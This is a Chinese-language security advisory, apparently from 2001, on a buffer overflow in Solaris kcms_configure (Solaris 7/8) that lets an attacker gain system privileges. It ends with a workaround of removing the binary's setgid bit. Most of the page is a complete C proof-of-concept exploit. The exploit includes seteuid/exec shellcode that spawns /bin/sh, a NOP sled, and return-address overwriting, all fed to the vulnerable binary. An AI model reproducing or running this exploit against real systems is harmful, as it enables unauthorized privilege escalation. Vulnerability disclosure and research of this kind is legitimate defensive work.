Solaris kcms_configure 漏洞

/ns/ld/unix/data/20010412042345.htm

漏洞类型:Sun 方式:remot

涉及程序:
Solaris kcms_configure

描述:
KCMS 缓冲区溢出导致攻击者取得系统特权漏洞

详细:
发现 Solaris 工具软件包 Kodak Color Management System (KCMS) 存在缓冲区溢出漏洞,攻击者利用此漏洞能取得系统特权。

以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负


Proof of Concept:
/*
Command line argument overflow
/usr/openwin/bin/kcms_configure


Proof of Concept Exploitation
Riley Hassell
*/


#include
#include
#include
#include


#define BUFLEN 1100


/* seteuid/exec shellcode */
char shell[] =
"\xeb\x0a\x9a\x01\x02\x03\x5c\x07\x04\xc3\xeb\x05\xe8\xf9\xff\xff\xff"
"\x5e\x29\xc0\x88\x46\xf7\x89\x46\xf2\x50\xb0\x8d\xe8\xe0\xff\xff\xff"
"\x29\xc0\x50\xb0\x17\xe8\xd6\xff\xff\xff\xeb\x1f\x5e\x8d\x1e\x89\x5e"
"\x0b\x29\xc0\x88\x46\x19\x89\x46\x14\x89\x46\x0f\x89\x46\x07\xb0"
"\x3b\x8d\x4e\x0b\x51\x51\x53\x50\xeb\x18\xe8\xdc\xff\xff\xff\x2f\x62"
"\x69\x6e\x2f\x73\x68\x01\x01\x01\x01\x02\x02\x02\x02\x03\x03\x03"
"\x03\x9a\x04\x04\x04\x04\x07\x04";


char buf[BUFLEN];
unsigned long int nop, esp;
long int offset = 0;


unsigned long int get_esp() { __asm__("movl %esp,%eax");}


int main (int argc, char *argv[])
{
int i;
if (argc > 1)
offset = strtol(argv[1], NULL, 0);
else
offset = -300;
nop = 600;
esp = get_esp();
memset(buf, 0x90, BUFLEN);
memcpy(buf+600, shell, strlen(shell));
for (i = nop+strlen(shell)+1; i <= BUFLEN-4; i += 4)
*((int *) &buf[i]) = esp+offset;
buf[BUFLEN-1] = '\0';
execl("/usr/openwin/bin/kcms_configure", "eEye",
"-o","-S","X",buf,NULL);
return;
}

受影响系统:
Solaris 7/8 (x86 and sparc)

--------------------------------------------------------------------------------

解决办法:
SUN 尚未推出补丁,建议您去掉 /usr/openwin/bin/kcms_configure 的 SETGID 特性。